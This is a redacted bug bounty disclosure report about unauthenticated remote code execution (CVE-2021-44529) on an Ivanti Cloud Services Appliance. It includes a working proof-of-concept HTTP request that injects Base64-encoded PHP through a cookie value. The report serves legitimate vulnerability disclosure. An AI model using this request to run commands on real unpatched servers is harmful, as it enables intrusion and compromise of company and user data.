[███████] Remote Code Execution at ██████ [CVE-2021-44529] [HtUS]

**IP Address used to find vulnerability:** `██████` **Vulnerable Website URL or Application:** `https://████` `pomcldsvr2.████` **Proof of ownership:** ███ **Summary:** The server at `https://███` is running a vulnerable version of CSA. A code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) allows an unauthenticated user to execute arbitrary code with limited permissions (nobody). **Steps to Reproduce:** Use Burp Repeater to send the following GET requests: *Please note that for the system commands to run, they need to be Base64 encoded. For example, for phpinfo, pass cGhwaW5mbygpOw==* - For phpinfo() ```` GET /client/index.php HTTP/1.1 Host: ███████ User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Connection: close Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=; Accept-Encoding: gzip, deflate ```` **Screenshots:** █████████ █████████ ██████ █████ ██████ **References:** - https://nvd.nist.gov/vuln/detail/CVE-2021-44529 - https://forums.ivanti.com/s/article/SA-2021-12-02 ## Impact **Impact:** Remote attackers can execute arbitrary commands on the server, and compromise company and user data. **CVSS Score: Critical** **Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H